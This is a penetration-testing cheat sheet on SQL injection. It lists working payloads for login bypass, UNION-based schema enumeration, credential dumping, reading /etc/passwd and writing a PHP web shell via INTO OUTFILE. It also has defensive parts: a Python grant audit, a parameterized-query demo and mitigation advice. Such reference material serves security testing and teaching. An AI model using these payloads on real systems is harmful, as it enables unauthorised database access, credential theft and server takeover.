## 🛡️ Methodology Checklist

- Test all input fields: add `'` and check for errors
- Identify DB type from error messages or behaviour
- Column count: `ORDER BY N` until error
- UNION injection: `UNION SELECT NULL,NULL,...`
- Data extraction: union to dump users, passwords, sensitive tables
- Blind time-based: `AND SLEEP(5)` (MySQL) / `WAITFOR DELAY '0:0:5'` (MSSQL)
- Out-of-band: DNS exfil with `LOAD_FILE` or MSSQL `xp_dirtree`
- Try SQLMap for automated exploitation after manual confirmation
## 🎯 Operational Context

Use when: SQL injection identified – quick reference for UNION payload construction, comment syntax, and database-specific functions.

Think Dumber First: Identify DB first: `@@version` (MSSQL/MySQL), `version()` (PostgreSQL), banner (Oracle). Then match cheat sheet to identified DB. Wrong DB syntax = all payloads fail.

Skip when: N/A – reference document.
## ⚡ Tactical Cheatsheet

| Command | Tactical Outcome |
|---|---|
| `'` | Probe for SQLi – syntax error confirms string context |
| `admin'-- -` | Auth bypass: comment out password check |
| `admin')-- -` | Auth bypass: close parenthesis first |
| `' OR '1'='1` | Universal auth bypass – no trailing quote |
| `cn' ORDER BY 1-- -` | Column count discovery (increment until error) |
| `cn' UNION SELECT 1,2,3,4-- -` | Column count discovery (increment until success) |
| `cn' UNION SELECT NULL,NULL,NULL,NULL-- -` | NULL padding (strict type bypass) |
| `cn' UNION SELECT 1,@@version,3,4-- -` | DBMS fingerprint / reflection point confirm |
| `cn' UNION SELECT 1,schema_name,3,4 FROM INFORMATION_SCHEMA.SCHEMATA-- -` | List all databases |
| `cn' UNION SELECT 1,database(),3,4-- -` | Current database |
| `cn' UNION SELECT 1,TABLE_NAME,TABLE_SCHEMA,4 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='[DB]'-- -` | List tables in DB |
| `cn' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='[TABLE]'-- -` | List columns |
| `cn' UNION SELECT 1,username,password,4 FROM [DB].[TABLE]-- -` | Dump data (dot operator!) |
| `cn' UNION SELECT 1, user(), 3, 4-- -` | Current DB user |
| `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read OS file (FILE privilege required) |
| `cn' UNION SELECT "", '<?php system($_REQUEST[0]); ?>', "", "" INTO OUTFILE '/var/www/html/shell.php'-- -` | Drop web shell |
## 🔬 Deep Dive & Workflow

### MySQL Comment Variants

- `-- -` → dash-dash-SPACE-dash (space is mandatory; extra dash ensures it)
- `#` → hash (URL: `%23`)
- `'--+` → URL-encoded for GET/browser (`+` = space)
- `')-- -` → close paren before commenting

### Auth Bypass Quick Reference

- `admin'-- -` → known user, comment out password
- `' OR '1'='1` → unknown user, inject both fields (no trailing quote)
- `admin' OR '1'='1` → known user, OR bypass (dev's quote closes it)
- `admin')-- -` → nested query: close paren first

### UNION Attack Checklist
- Confirm injection: `'` → syntax error
- Count columns: `ORDER BY N` until error, or `UNION SELECT 1,2,...` until success
- Find reflection points: visible integers in response
- Force first row: use `id=-1` or a non-existent value to surface UNION results
- Fingerprint: `@@version`, `POW(1,1)`, `SLEEP(5)`
- Enumerate schema via `INFORMATION_SCHEMA`
- Dump target data with dot operator
### Escalation Decision Tree

```text
Have FILE privilege + empty secure_file_priv?
├── Yes → LOAD_FILE for read; INTO OUTFILE for web shell
└── No  → Stick to database enumeration; look for hardcoded creds in app tables
```
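The decision tree above is the attacker's view of two settings a DBA controls: which privileges the web application's account holds, and whether `secure_file_priv` is empty, `NULL` or a directory. The audit below is an added example, not from the cheat sheet. It parses `SHOW GRANTS`-style lines and the `secure_file_priv` value and reports whether the `LOAD_FILE` / `INTO OUTFILE` branch is open; the two grant sets and the `/var/lib/mysql-files/` path are constructed sample input (the least-privilege set mirrors the `webuser` grant from the Mitigation Snippets).

```python
"""Audit a MySQL application account against the escalation conditions above.

Added example (not from the cheat sheet): evaluates FILE privilege together
with secure_file_priv, and flags global-scope or ALL PRIVILEGES grants.
"""
import re

# Privileges that give an injected query file-system reach.
FILE_PRIVS = {"FILE", "ALL PRIVILEGES", "ALL"}

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<user>\S+)", re.I)

# Constructed sample output in SHOW GRANTS style (not captured from a real server).
OVERPRIVILEGED = [
    "GRANT ALL PRIVILEGES ON *.* TO 'webuser'@'localhost'",
]
LEAST_PRIVILEGE = [
    "GRANT USAGE ON *.* TO `webuser`@`localhost`",
    "GRANT SELECT ON `ilfreight`.`ports` TO `webuser`@`localhost`",
]


def parse_grant(line: str) -> dict:
    """Return {'privs': set, 'scope': str, 'user': str} for one SHOW GRANTS line.
    Accepts both 'user'@'host' (5.7) and `user`@`host` (8.0) quoting.
    Column-level grants such as SELECT (col) are out of scope for this parser."""
    m = GRANT_RE.match(line.strip().rstrip(";"))
    if not m:
        raise ValueError(f"not a GRANT statement: {line!r}")
    privs = {p.strip().upper() for p in m["privs"].split(",")}
    scope = m["scope"].replace("`", "").replace("'", "")
    user = m["user"].replace("`", "").replace("'", "")
    return {"privs": privs, "scope": scope, "user": user}


def audit_account(grant_lines, secure_file_priv) -> dict:
    """Walk the decision tree from the defender's side.

    secure_file_priv semantics (MySQL): NULL disables file I/O entirely,
    '' leaves it unrestricted, a path confines reads/writes to that directory.
    """
    grants = [parse_grant(l) for l in grant_lines]
    all_privs = set().union(*(g["privs"] for g in grants))
    has_file = bool(all_privs & FILE_PRIVS)
    global_scope = any(g["scope"] == "*.*" and g["privs"] != {"USAGE"} for g in grants)

    sfp = "" if secure_file_priv is None else str(secure_file_priv).strip()
    if secure_file_priv is None or sfp.upper() == "NULL":
        file_io = "disabled"
    elif sfp == "":
        file_io = "unrestricted"
    else:
        file_io = f"confined to {sfp}"

    findings = []
    if has_file and file_io == "unrestricted":
        findings.append("FILE privilege with empty secure_file_priv: "
                        "LOAD_FILE/INTO OUTFILE reachable anywhere the server can write")
    elif has_file:
        findings.append(f"FILE privilege present but file I/O {file_io}")
    if global_scope:
        findings.append("non-USAGE grant on *.* (global scope): scope it to the app schema")
    if all_privs & {"ALL PRIVILEGES", "ALL"}:
        findings.append("ALL PRIVILEGES granted: replace with explicit SELECT/INSERT/UPDATE")

    if has_file and file_io == "unrestricted":
        risk = "high"
    elif findings:
        risk = "medium"
    else:
        risk = "low"
    return {"has_file_priv": has_file, "file_io": file_io,
            "findings": findings, "risk": risk}


if __name__ == "__main__":
    for label, grants, sfp in (("overprivileged", OVERPRIVILEGED, ""),
                               ("least privilege", LEAST_PRIVILEGE, "/var/lib/mysql-files/")):
        report = audit_account(grants, sfp)
        print(f"{label}: risk={report['risk']} file_io={report['file_io']}")
        for f in report["findings"]:
            print("  -", f)
```

In practice the inputs come from `SHOW GRANTS FOR 'webuser'@'localhost'` and `SHOW VARIABLES LIKE 'secure_file_priv'`; the function is kept free of a database connection so it can run against pasted output during a review.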
### CONCAT for Single Reflection Point

```sql
cn' UNION SELECT 1, CONCAT(username, ':', password), 3, 4 FROM dev.credentials-- -
cn' UNION SELECT 1, GROUP_CONCAT(username, ':', password SEPARATOR '\n'), 3, 4 FROM dev.credentials-- -
```

### Mitigation Snippets (Defensive)
```php
// Prepared statements (gold standard): user input is bound, never parsed as SQL
$stmt = mysqli_prepare($conn, "SELECT * FROM logins WHERE username=? AND password=?");
mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
mysqli_stmt_execute($stmt);
$result = mysqli_stmt_get_result($stmt);
// Production code stores a salted hash and checks it with password_verify()
```

```sql
-- Least privilege: set the password on CREATE USER, then grant only what the app needs
-- (GRANT ... IDENTIFIED BY was removed in MySQL 8.0)
CREATE USER 'webuser'@'localhost' IDENTIFIED BY 'p@ssw0Rd!!';
GRANT SELECT ON ilfreight.ports TO 'webuser'@'localhost';
```

## 🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| UNION injection column count wrong | Column mismatch | Find count: `ORDER BY 1--`, `ORDER BY 2--` until error; column before error = count |
| String concatenation syntax varies | DB-specific | MySQL: `CONCAT(a,b)` or `a,b`; MSSQL: `a+b`; Oracle: `a\|\|b`; PostgreSQL: `a\|\|b` |
| NULL vs string column types | Type mismatch in UNION | Use NULL for unknown: `UNION SELECT NULL,NULL,NULL--`; replace NULLs with values one at a time |
| Comments blocked | Filter on `--` or `#` | Try: `--+`, `-- -`, `/*!*/`, `/**/`, `%23` (URL-encoded `#`) |
| Stacked queries fail | DB or driver doesn't support | MySQL via PHP PDO: no stacked queries; try time-based blind instead |
## 📋 Reporting Trigger

Finding Title: SQL Injection – Cheat Sheet Applied for Database Extraction

Impact: SQL injection exploitation enables reading arbitrary database content, bypassing authentication, executing OS commands (via xp_cmdshell or UDF), and potentially compromising the underlying server depending on database privileges.

Root Cause: User input concatenated into SQL queries without parameterization.

Recommendation: Use parameterized queries / prepared statements for all database interactions. Implement allowlist input validation. Apply least-privilege to database accounts. Deploy WAF with SQLi detection rules.
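The root cause and the first two recommendations side by side, as an added example that is not the cheat sheet's own PHP snippet: the `mysqli_prepare` pattern from the Mitigation Snippets is ported to Python's `sqlite3` so it runs offline, and the concatenated query that the report names as root cause sits next to it. The `logins` table, its single constructed account and the `username_allowed` allowlist are assumptions of this example; the bypass strings are the ones from the cheat sheet, used here only to show that they fail against the bound query.

```python
"""Vulnerable string-built login beside the parameterized fix.

Added example (not from the cheat sheet). Uses sqlite3 in memory; the
parameter marker (?) and the -- comment syntax match MySQL for this purpose.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory logins table with one constructed test account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (username TEXT, password TEXT)")
    # Constructed credential; a real system stores a salted hash and verifies it in code.
    conn.execute("INSERT INTO logins VALUES ('admin', 'correct horse battery staple')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Root cause from the report: input concatenated into the query text,
    so a quote plus a comment terminator rewrites the WHERE clause."""
    sql = f"SELECT 1 FROM logins WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Prepared statement: the values are bound as data, never parsed as SQL,
    so the same payloads are simply compared against the stored strings."""
    sql = "SELECT 1 FROM logins WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Allowlist for the username field (assumed policy): defence in depth, not a
# substitute for parameter binding.
ALLOWED_USERNAME = re.compile(r"[a-z0-9_.-]{1,32}")


def username_allowed(username: str) -> bool:
    """True only if the username consists entirely of allowlisted characters."""
    return ALLOWED_USERNAME.fullmatch(username) is not None


if __name__ == "__main__":
    conn = make_db()
    for user, pwd in (("admin", "correct horse battery staple"),
                      ("admin'-- -", "wrong"),
                      ("' OR '1'='1", "' OR '1'='1")):
        print(f"{user!r:22} concat={login_vulnerable(conn, user, pwd)!s:5} "
              f"bound={login_safe(conn, user, pwd)!s:5} allowlist={username_allowed(user)}")
```

The bound query rejects both bypass strings without any filtering, which is why the report's first recommendation is parameterization; the allowlist is listed second because it narrows what reaches the database but cannot make a concatenated query safe.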